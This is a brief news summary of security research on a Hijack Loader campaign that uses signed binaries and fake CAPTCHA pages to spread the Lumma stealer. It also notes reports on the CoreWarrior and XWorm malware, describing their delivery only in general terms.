Cybersecurity researchers from HarfangLab have discovered a new malware campaign involving Hijack Loader artifacts signed with legitimate code-signing certificates. The attack chains aim to distribute an information stealer called Lumma, by tricking users into downloading a booby-trapped binary disguised as pirated software or movies. The malware has gone through variations directing users to fake CAPTCHA pages, coercing them to run encoded PowerShell commands that drop a malicious payload in ZIP archive form
The delivery tactic switched from DLL side-loading to signed binaries in early October 2024 to avoid detection. Some certificates used were stolen and revoked, while others may have been generated by threat actors, challenging the notion that code-signing alone ensures trustworthiness. This investigation coincides with SonicWall Capture Labs' warning of a surge in cyber attacks with CoreWarrior malware infecting Windows machines. The report also highlights phishing campaigns distributing XWorm malware via WSF and PowerShell scripts, leading to the injection of XWorm into legitimate processes. XWorm's updated versions include advanced capabilities to avoid detection and carry out malicious actions, reflecting the evolving landscape of cyber threats and the need for robust security measures to safeguard systems and data against sophisticated attacks. https://thehackernews.com/2024/10/researchers-uncover-hijack-loader.html